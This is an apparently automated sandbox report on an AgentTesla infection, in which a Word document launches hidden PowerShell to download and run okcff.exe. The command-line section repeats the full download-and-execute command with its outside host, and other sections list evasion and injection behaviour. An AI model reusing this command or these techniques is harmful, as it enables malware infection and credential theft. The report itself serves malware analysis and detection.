Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\okcff.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\okcff.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1592	Thread sleep time: -33000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 308	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2292	Thread sleep count: 302 > 30
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 1012	Thread sleep count: 9438 > 30
Source: C:\Users\user\AppData\Roaming\okcff.exe TID: 2108	Thread sleep count: 101 > 30

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\okcff.exe

Window / User API: threadDelayed 9438

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\okcff.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\okcff.exe	Thread delayed: delay time: 30000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: okcff.exe, 00000009.00000002.620634062.000000000079D000.00000004.00000020.sdmp

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\okcff.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects files into Windows application

Source: C:\Windows\System32\notepad.exe

Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Bypasses PowerShell execution policy

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\okcff.exe

Memory written: C:\Users\user\AppData\Roaming\okcff.exe base: 400000 value starts with: 4D5A

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 2

Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\okcff.exe	Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
Source: C:\Users\user\AppData\Roaming\okcff.exe	Queries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\okcff.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\okcff.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

Yara detected Credential Stealer

Source: Yara match

File source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
